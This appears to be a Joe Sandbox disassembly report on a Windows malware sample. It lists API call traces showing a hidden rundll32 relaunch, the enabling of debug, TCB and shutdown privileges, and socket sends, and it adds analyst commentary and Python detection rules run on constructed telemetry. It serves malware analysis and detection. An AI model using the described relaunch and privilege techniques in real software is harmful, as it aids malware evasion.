                                              • Instruction Fuzzy Hash: 1741B335540345AAEF109FA4DC49BAA7BB8FF48310F109499FA0D9B281D779D849CB68
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF7C0E
                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04BF7C28
                                              • GetModuleFileNameW.KERNEL32(04C07BC8,0000030C), ref: 04BF7C43
                                              • PathFindFileNameW.SHLWAPI(04C07BC8,?), ref: 04BF7C51
                                              • wsprintfW.USER32 ref: 04BF7C6B
                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF7CB3
                                              • ExitProcess.KERNEL32 ref: 04BF7CBA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                              • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                              • API String ID: 3592876439-3730106045
                                              • Opcode ID: cce8c04ee3eda659e11b1f5650c25b1d33f4d6350fe9b6586eecf0ecf056cfd3
                                              • Instruction ID: d24f191e5c311a76aff4446bc8d448bd4038d4d5b0ef278b8ecd6b64a15632ab
                                              • Opcode Fuzzy Hash: cce8c04ee3eda659e11b1f5650c25b1d33f4d6350fe9b6586eecf0ecf056cfd3
                                              • Instruction Fuzzy Hash: B21142B25011196BEB119BA4CD48EEF77BDEB09301F0441A6F60AE3141EE35AE588B74
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,75DAB010,00000000,00000000), ref: 04BF69E3
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF69EC
                                              • memcpy.MSVCRT ref: 04BF6A19
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF6A3D
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF6A40
                                              • memcpy.MSVCRT ref: 04BF6A6F
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 04BF6A8F
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6A92
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF6A99
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6A9C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 3405790324-0
                                              • Opcode ID: 34fb8cff60e9aaa6c88d8f49ac91f26efb5fdb57996bd56bb1bf06d9616bbd3e
                                              • Instruction ID: 15475b1205d466d7d8bba2fa35de3337dea217fe564cfc69308889cf5700f2af
                                              • Opcode Fuzzy Hash: 34fb8cff60e9aaa6c88d8f49ac91f26efb5fdb57996bd56bb1bf06d9616bbd3e
                                              • Instruction Fuzzy Hash: D531647590010AAFDB149FA8CC45E9E7BB9EF58344F058491EE08CB251E670F719CB90
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,75A373E0,00000000), ref: 04BF68EB
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF68F4
                                              • memcpy.MSVCRT ref: 04BF6921
                                              • GetProcessHeap.KERNEL32(00000008,?,771AE010), ref: 04BF6946
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF6949
                                              • memcpy.MSVCRT ref: 04BF6978
                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BF6995
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6998
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF699F
                                              • HeapFree.KERNEL32(00000000), ref: 04BF69A2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 3405790324-0
                                              • Opcode ID: 30647581b21f7b9ffd1a9185e82eb39d4ae96244bc568c02ae26f023a16c9217
                                              • Instruction ID: 51ca5ff304164014c34039945badf4871eefb9c132f1abcdc2a0c18fb1a26d81
                                              • Opcode Fuzzy Hash: 30647581b21f7b9ffd1a9185e82eb39d4ae96244bc568c02ae26f023a16c9217
                                              • Instruction Fuzzy Hash: 4C31617590010AAFDB14EFA8CC45EAFBBB8EF58344F058455EA09CB251E770EA18CB90
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40F8
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40FB
                                              • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF4148
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF414B
                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF4184
                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04BF423E,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF41BC
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?), ref: 04BF41CB
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41CE
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41D7
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41DA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreeSleep
                                              • String ID:
                                              • API String ID: 1437939644-0
                                              • Opcode ID: 11753fff5008642181fc6908328adb8f4f3869a16114ca3bcddc9b430b90021f
                                              • Instruction ID: 4f815b83b3f9cfe0e32b187b02501d60af43e88b0df90b87200cfa83e8182868
                                              • Opcode Fuzzy Hash: 11753fff5008642181fc6908328adb8f4f3869a16114ca3bcddc9b430b90021f
                                              • Instruction Fuzzy Hash: E3318FB4400315AADB209FA5CC08B6B7FF8EF59300F00854AFE8E97291D778E959DB60
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 04BF78AF
                                              • srand.MSVCRT ref: 04BF78B2
                                              • GetTickCount.KERNEL32 ref: 04BF78B9
                                                • Part of subcall function 04BF7CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04BF79E8), ref: 04BF7CE9
                                                • Part of subcall function 04BF7CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04BF79E8), ref: 04BF7CF0
                                                • Part of subcall function 04BF7CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04BF7D02
                                                • Part of subcall function 04BF7CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BF7D25
                                                • Part of subcall function 04BF7CC5: GetLastError.KERNEL32(?,00000000), ref: 04BF7D2D
                                                • Part of subcall function 04BF7CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,04BF79E8), ref: 04BF7D3F
                                              • GetModuleFileNameW.KERNEL32(04C07BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF7926
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                              • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                              • API String ID: 1536163209-50072501
                                              • Opcode ID: 89b33c89be121251bbf00dacbdf0df73a2b5e6c7d8dd6bb0b2791e134156af00
                                              • Instruction ID: bd40b678b27c594854e5e94ed106abd3b97a0f28e2b1a83d3077bbd90c62e092
                                              • Opcode Fuzzy Hash: 89b33c89be121251bbf00dacbdf0df73a2b5e6c7d8dd6bb0b2791e134156af00
                                              • Instruction Fuzzy Hash: 62017174D01220ABE714BBB6AC09B4A7E5EEB00794B4540E5EA0993180DF78FD04DFA0
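The two traces above show the sample's relaunch and its privilege set-up. The function at 04BF7C0E assembles the command line "<system directory>\rundll32.exe C:\Windows\<own file name>,#1 <arg>" from the %ws format string (GetSystemDirectoryW + lstrcatW for the rundll32 path, GetModuleFileNameW + PathFindFileNameW for its own file name), starts it with CreateProcessW using creation flag 0x08000000 (CREATE_NO_WINDOW) and then calls ExitProcess, so execution continues inside rundll32.exe with the dropped file loaded as a module whatever its extension. The function at 04BF78AF seeds rand with GetTickCount and invokes subcall 04BF7CC5 once per privilege name (OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError) for SeTcbPrivilege, SeDebugPrivilege and SeShutdownPrivilege. The Python below is a detection example added to this page, not code from the sample or from Joe Sandbox: it scores process-creation command lines for the rundll32 pattern and correlates simplified Windows security event 4703 ("A token right was adjusted") records per process. The telemetry is constructed; the file name payload.exe, the trailing "run" argument and the record field names are placeholders, since the report does not show them.

```python
import re
from collections import defaultdict

# ---- Rule 1: rundll32 relaunch of a non-DLL module from C:\Windows ----------
# Matches the command line the function at 04BF7C0E assembles with wsprintfW,
# "<sysdir>\rundll32.exe C:\Windows\<own file name>,#1 <arg>", as well as the
# usual "rundll32.exe <module>,<ExportName> ..." shape used by legitimate callers.
RUNDLL32_RE = re.compile(
    r'rundll32\.exe"?\s+"?(?P<module>[^",]+?)"?\s*,\s*(?P<export>#\d+|[A-Za-z_]\w*)',
    re.IGNORECASE,
)


def analyze_rundll32(command_line):
    """Score one process-creation command line. Returns None when rundll32 is not
    the image being launched, else a finding dict with the reasons that fired."""
    match = RUNDLL32_RE.search(command_line)
    if match is None:
        return None
    module = match.group("module").strip()
    export = match.group("export")
    directory, _, name = module.rpartition("\\")
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    reasons = []
    if directory.lower() == "c:\\windows":
        reasons.append("module sits directly in C:\\Windows, not a subdirectory")
    if ext != "dll":
        reasons.append("module extension is '%s', not .dll" % (ext or "<none>"))
    if export.startswith("#"):
        reasons.append("export invoked by ordinal " + export)
    # A single oddity (e.g. a legitimate ordinal call into a System32 DLL) is not
    # enough on its own; the relaunch observed above fires all three.
    return {
        "module": module,
        "export": export,
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,
    }


# ---- Rule 2: one process enabling SeTcb + SeDebug + SeShutdown -------------
# Subcall 04BF7CC5 runs OpenProcessToken -> LookupPrivilegeValueW ->
# AdjustTokenPrivileges -> GetLastError once per privilege name, so event 4703
# arrives as separate records that have to be correlated per process.
TARGET_PRIVILEGES = frozenset(
    {"SeTcbPrivilege", "SeDebugPrivilege", "SeShutdownPrivilege"}
)


def correlate_privilege_events(events):
    """events: iterable of simplified 4703 records {event_id, pid, process, enabled}
    (placeholder field names). Returns {pid: finding} for every process that
    enabled all three target privileges across any number of records."""
    enabled_by_pid = defaultdict(set)
    process_by_pid = {}
    for event in events:
        if event.get("event_id") != 4703:
            continue
        enabled_by_pid[event["pid"]].update(event.get("enabled", []))
        process_by_pid[event["pid"]] = event["process"]
    return {
        pid: {"process": process_by_pid[pid], "enabled": sorted(privs)}
        for pid, privs in enabled_by_pid.items()
        if TARGET_PRIVILEGES <= privs
    }


# ---- Constructed sample telemetry (not taken from the report) --------------
# "payload.exe" and the trailing "run" argument stand in for the file name and
# the third %ws that the report does not show.
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\payload.exe,#1 run",
    "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL desk.cpl",
    "C:\\Windows\\System32\\notepad.exe C:\\Users\\alice\\notes.txt",
]

SAMPLE_4703_EVENTS = [
    {"event_id": 4703, "pid": 4812, "process": "C:\\Windows\\System32\\rundll32.exe", "enabled": ["SeTcbPrivilege"]},
    {"event_id": 4703, "pid": 4812, "process": "C:\\Windows\\System32\\rundll32.exe", "enabled": ["SeDebugPrivilege"]},
    {"event_id": 4703, "pid": 4812, "process": "C:\\Windows\\System32\\rundll32.exe", "enabled": ["SeShutdownPrivilege"]},
    {"event_id": 4703, "pid": 1200, "process": "C:\\Windows\\System32\\svchost.exe", "enabled": ["SeShutdownPrivilege"]},
]


def run_sample():
    """Apply both rules to the constructed telemetry and return the hits."""
    rundll32_hits = [
        finding for finding in map(analyze_rundll32, SAMPLE_COMMAND_LINES)
        if finding is not None and finding["suspicious"]
    ]
    return {
        "rundll32": rundll32_hits,
        "privileges": correlate_privilege_events(SAMPLE_4703_EVENTS),
    }


if __name__ == "__main__":
    for key, hits in run_sample().items():
        print(key, hits)
```

Two caveats when deploying this against real telemetry. AdjustTokenPrivileges returns nonzero even when the token does not hold a requested privilege, reporting the shortfall only through GetLastError as ERROR_NOT_ALL_ASSIGNED (1300), which is why the trace checks GetLastError right after the call; a process that lacks SeTcbPrivilege therefore never produces the full set, so the second rule only fires for tokens that already carry it, and a partial set from an unexpected image is still worth a lower-severity alert. Event 4703 is also not audited by default and must be enabled under the Detailed Tracking audit policy before the correlation has anything to read.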
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000068,771AF380,?,77735E70,?,04BF51F9,?,?,?), ref: 04BF4F56
                                              • HeapAlloc.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF4F5D
                                              • rand.MSVCRT ref: 04BF4F86
                                              • GetProcessHeap.KERNEL32(00000008,?,04BF51F9,?,00000000,?,04BF51F9,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04BF4FF7
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4FFE
                                              • GetProcessHeap.KERNEL32(00000008,00000000,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04BF51F9,?,?,?), ref: 04BF5007
                                              • HeapFree.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF500E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Allocrand
                                              • String ID: p
                                              • API String ID: 2875874559-2181537457
                                              • Opcode ID: 6e40b4a478b869dc380e1d2cb6f2817b8b5ca13552f6997cbfe27ae6f5a7e177
                                              • Instruction ID: 92732880ab47e0123ee721e20abbd3be0bb6c5e0003fd59a28945e4d20c1a840
                                              • Opcode Fuzzy Hash: 6e40b4a478b869dc380e1d2cb6f2817b8b5ca13552f6997cbfe27ae6f5a7e177
                                              • Instruction Fuzzy Hash: 1A21E235500244BBEF219FE4CC88FAF7F79EF55311F008086FA099B181C6759859DBA1
                                              APIs
                                              • CreateFileW.KERNEL32(04C07BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04BF884F
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 04BF8860
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF886F
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF8876
                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 04BF888F
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF88A0
                                              • HeapFree.KERNEL32(00000000), ref: 04BF88A7
                                              • CloseHandle.KERNEL32(?), ref: 04BF88C6
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 3250796435-0
                                              • Opcode ID: a90db505c7ff53893c4e33a8ea14444687a36c7d85ac87e638091028b11d7c2d
                                              • Instruction ID: d8769bba87939c748056276d2d249524355589308150c468af8e481995f4481f
                                              • Opcode Fuzzy Hash: a90db505c7ff53893c4e33a8ea14444687a36c7d85ac87e638091028b11d7c2d
                                              • Instruction Fuzzy Hash: BC114F70900104BBEB206FA5EC8CEAFBFBCEB85751F10415AF51AA3180D3789D45DA60
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04BF3745,?,?,?,00000000,00000000,?,?,?,04BF4A6E), ref: 04BF33BB
                                              • HeapAlloc.KERNEL32(00000000,?,04BF3745,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?), ref: 04BF33C2
                                              • htons.WS2_32(?), ref: 04BF33E1
                                              • memcpy.MSVCRT ref: 04BF3410
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF3421
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF3434
                                              • HeapFree.KERNEL32(00000000), ref: 04BF343B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                              • String ID:
                                              • API String ID: 4260819906-0
                                              • Opcode ID: 7af4a71885538010400e40ee1eb9fd32626979fbfa9af6033ca3852035df8cd0
                                              • Instruction ID: 10fca1514a38e8c8be5458f1580aa7cc62ff52dcbf64e65104e652f99590c63d
                                              • Opcode Fuzzy Hash: 7af4a71885538010400e40ee1eb9fd32626979fbfa9af6033ca3852035df8cd0
                                              • Instruction Fuzzy Hash: 7C118E76400249ABEF019FA8DC89BAF7BACEF09314F044086FE059B241D779D909DB70
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E), ref: 04BF3220
                                              • HeapAlloc.KERNEL32(00000000,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?), ref: 04BF3227
                                              • htons.WS2_32(?), ref: 04BF3246
                                              • memcpy.MSVCRT ref: 04BF3276
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF3287
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF329A
                                              • HeapFree.KERNEL32(00000000), ref: 04BF32A1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                              • String ID:
                                              • API String ID: 4260819906-0
                                              • Opcode ID: af9c841b9dce6fa40d2751aa705da50770be4ba3b4f921fc526487b1b3086e16
                                              • Instruction ID: faaeff4fd3e7dcefe8b2eaaebf19e5b3c1921f962e87e6c231958c8bf4c1db92
                                              • Opcode Fuzzy Hash: af9c841b9dce6fa40d2751aa705da50770be4ba3b4f921fc526487b1b3086e16
                                              • Instruction Fuzzy Hash: C6112C76500249AAEF009FE8DC49BAF7BA8EB49315F044046FE059B281D779D905D774
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C29
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C2C
                                              • GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C39
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C3C
                                              • GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C4E
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C51
                                              • GetProcessHeap.KERNEL32(00000000,00000000,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C56
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C59
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 50667b56249ce357bdd4fedca84a12f87ea01c260cd184ded7d54b4c3550abed
                                              • Instruction ID: 4606a42febab0d0a4467d7744dce5644460969bd20d6aa7e05b58819daa54fc0
                                              • Opcode Fuzzy Hash: 50667b56249ce357bdd4fedca84a12f87ea01c260cd184ded7d54b4c3550abed
                                              • Instruction Fuzzy Hash: C7114931600308EFDB20EF96CD84F2AB3B9EF85341F010499EA49976A1DB70FD49CA60
                                              APIs
                                              • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,04BF7A8E,?), ref: 04BF6566
                                              • StrToIntW.SHLWAPI(00000000,?,?,?,?,04BF7A8E,?), ref: 04BF6581
                                              • StrStrW.SHLWAPI(00000000,04C01580,?,?,?,?,?,04BF7A8E,?), ref: 04BF65B3
                                              • StrStrW.SHLWAPI(00000000,04C01588,?,?,?,?,?,04BF7A8E,?), ref: 04BF65CD
                                              • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,04BF7A8E,?), ref: 04BF65DF
                                              • LocalFree.KERNEL32(00000000,?,?,?,?,04BF7A8E,?), ref: 04BF6607
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ArgvCommandFreeLineLocal
                                              • String ID:
                                              • API String ID: 1203019955-0
                                              • Opcode ID: b0f28eafb8b963e19d10580aea5254bdcb00160d914c48e0868002f923d514ba
                                              • Instruction ID: aa2c9a961da336a7a438d2807b1538d82c4b777b02cd2efe316e9c1f9c10774c
                                              • Opcode Fuzzy Hash: b0f28eafb8b963e19d10580aea5254bdcb00160d914c48e0868002f923d514ba
                                              • Instruction Fuzzy Hash: 7B31D531901118FFDF219F68CD44AADBB68FF14745B0480A6FD0AE7240E774FA4A9B90
                                              APIs
                                                • Part of subcall function 04BF6CED: GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFC
                                                • Part of subcall function 04BF6CED: HeapAlloc.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFF
                                                • Part of subcall function 04BF6CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D24
                                                • Part of subcall function 04BF6CED: HeapFree.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D27
                                              • CreateThread.KERNEL32(00000000,00000000,04BF988B,?,00000004,00000000), ref: 04BF98FD
                                              • SetThreadToken.ADVAPI32(?,?,?,04BFA15C,?,?), ref: 04BF990F
